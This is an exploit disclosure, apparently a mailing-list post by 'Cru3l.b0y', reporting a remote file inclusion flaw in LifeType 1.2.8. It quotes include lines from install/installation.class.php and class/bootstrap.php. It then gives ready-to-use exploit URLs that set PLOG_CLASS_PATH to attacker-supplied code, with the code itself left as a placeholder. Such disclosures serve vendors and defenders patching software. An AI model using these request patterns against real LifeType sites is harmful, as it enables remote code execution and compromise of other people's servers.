LifeType 1.2.8 Remote File Inclusion Vulnerability

["Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>]

Hi Dear,
I found a new bug in LifeType. Please publish it.
thank you
best regards

/===============================================================================================================================================\
  |                                                                             
                                                                                
                                  |
  |  [o] LifeType 1.2.8 Remote File Inclusion Vulnerability                     
                                                  |
  |                                                                             
                                                                                
                                  |
  |       Software : LifeType 1.2.8
  |       Vendor   : http://lifetype.net/
  |       Author   : Cru3l.b0y                                                  
                                                                          |
  |       Contact  : Cru3l.b0y@xxxxxxxxxxxxxxxx                                 
                                                          |
  |               Home     : WwW.DeltaHacking.Net                               
                
  
|===============================================================================================================================================|
  |                                                                             
                                                                                
                                  |
  |  [o] Vulnerable file                                                        
                                                                                
          |
  |                                                                             
                                                                                
                                  |
  |       install/installation.class.php                                        
                                                  |
  |                                                                             
                                                                                
                                  |
  |        include_once( PLOG_CLASS_PATH."config/config.properties.php" );      
                      | 
  |                                                                             
                  |
  |       class/bootstrap.php                                                   
                  |
  |                                                                             
                  |
  |                include( PLOG_CLASS_PATH."class/object/loader.class.php" );  
                          |
  |                                                                             
                          |
  |                                                                             
                  |
  |  [o] Exploit                                                                
                                                                                
                  |
  |                                                                             
                                                                                
                                  |
  |       
http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
       |
  |       
http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]          
        |
  |                                                                             
                                                                                
                                  |
  
|===============================================================================================================================================|